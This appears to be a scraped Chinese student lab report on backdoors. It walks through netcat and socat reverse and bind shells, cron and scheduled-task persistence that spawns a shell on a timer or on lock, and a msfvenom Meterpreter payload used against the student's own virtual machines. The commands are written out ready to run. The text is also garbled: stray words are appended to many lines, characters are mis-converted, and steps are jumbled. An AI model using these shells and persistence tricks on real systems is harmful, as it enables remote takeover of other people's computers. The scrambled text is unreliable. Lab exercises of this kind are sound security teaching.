目錄html
例舉你能想到的一個後門進入到你係統中的可能方式?linux
例舉你知道的後門如何啓動起來(win及linux)的方式?git
Meterpreter有哪些給你映像深入的功能?shell
如何發現本身有系統有沒有被安裝後門?windows
安裝殺毒軟件,定時檢查本身的電腦安全
保持本身電腦的windows defender處於開啓的狀態服務器
可以及時的發現後門,並刪除。網絡
參考資料:tcp
Netcat簡介工具
關於netcat,找了一些專門介紹的博客,netcat是一個經過TCP/UDP在網絡中進行讀寫數據工具,被稱爲「瑞士軍刀」,主要用於調試領域、傳輸領域甚至黑客攻擊領域。利用該工具,能夠將網絡中一端的數據完整的發送至另外一臺主機終端顯示或存儲,常見的應用爲文件傳輸、與好友即時通訊、傳輸流媒體或者做爲用來驗證服務器的獨立的客戶端。
主要功能
netcat在kali裏能夠直接使用,windows中須要下載後使用(Socat同理)。
它的簡單使用過程在下面實踐過程記錄中會有詳細的介紹。
參考資料:
Netcat++,超級netcat工具
參考資料:
這是一個生成後門程序的平臺,把後門的基本功能(基本的鏈接、執行指令),擴展功能(如蒐集用戶信息、安裝服務等功能),編碼模式,運行平臺,以及運行參數,全都作成零件或可調整的參數。用的時候按須要組合,就能夠生成一個可執行文件。
本次實驗主要用Metaspolit的msfvenom指令來生成一個後門可執行文件。
寫在前面的話:在本次實驗中我一開始用的是本機做爲windows端,可是因爲個人win10是家庭版,windows defender不能徹底關閉,在設置文件夾信任以後,權限又出現了問題,因此,後來在完成任務四時,切到了虛擬機來完成。如下是個人三個端的IP地址
本機windows 172.16.2.51
虛擬機kali 192.168.139.138
虛擬機windows7 192.168.139.140
ncat.exe -l -p 5211
,打開監聽,其中,5211爲監聽的端口。nc 192.168.20.175 5211 -e /bin/sh
,反彈鏈接Windows端。這個操做與上一個操做相似了,如下主要過程:
nc -l -p 5211
ncat.exe -e cmd.exe 192.168.139.138 5211
ncat.exe -l 5211
,實現監聽5211端口ncat 172.16.2.51 5211
,鏈接到windows的5211端口,輸入一些數據Cron是Linux下的定時任務,每一分鐘運行一次,根據配置文件執行預設的指令
ncat.exe -l -p 5211
,監聽本機的5211端口。在kali端下,輸入crontab -e,實現編輯一條定時任務。
打開後,在最後一行添加 命令 05 * * * * /bin/netcat 172.16.2.51 5211 -e /bin/sh
,即爲每小時的5分運行此命令。
在windows系統下,計算機管理
-->任務計劃程序
-->建立任務
新建觸發器,選擇,當工做站鎖定時。
在操做中,將程序或腳本中選擇socat.exe
路徑,參數一欄填寫tcp-listen:5211 exec:cmd.exe,pty,stderr
socat - tcp:172.16.2.51:5211
,便可得到windows的shell。msfvenom
指令生成一個後門程序。msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.138 LPORT=5211 -f exe > 20165211_Akashi.exe
經過nc將生成的可執行文件發送到目標windows端
Kali端:
windows端:
kali端:
在嘗試獲取主機攝像頭時,出現了以下錯誤
檢查後發現,虛擬的攝像頭未分配,將虛擬機的攝像頭打開後便可正常運行。
在本次實驗中,在體驗了MSF的功能以後,雖然是一場本身打本身的過程,可是在現實中,若是不注意信息安全,沒有安全意識,這樣簡單的過程,其實徹底能夠完成一場完整的黑客行爲。(默默關掉了攝像頭……)
仍是要注意本身的信息安全,不隨意使用來路不明的U盤,不點擊有危險的文件,網絡危機四伏,仍是要時刻注意的。